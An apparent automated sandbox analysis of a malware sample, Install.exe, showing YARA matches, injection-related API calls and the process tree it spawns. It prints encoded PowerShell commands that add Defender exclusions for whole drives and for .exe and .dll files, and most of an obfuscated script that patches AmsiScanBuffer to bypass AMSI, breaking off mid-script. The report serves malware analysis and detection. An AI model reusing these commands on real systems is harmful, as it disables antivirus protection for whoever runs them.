Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPED |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
1_2_0040352D |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle, |
39_2_0000000140001420 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle, |
39_2_0000000140001430 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey, |
42_2_000001AFDDD03120 |
Source: unknown |
Process created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe" |
|
Source: C:\Users\user\Desktop\Install.exe |
Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe |
|
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\Install.exe |
Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe |
|
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
|
Source: C:\Users\user\AppData\Roaming\34432.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" |
|
Source: C:\Users\user\AppData\Roaming\34432.exe |
Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe |
|
Source: unknown |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAj |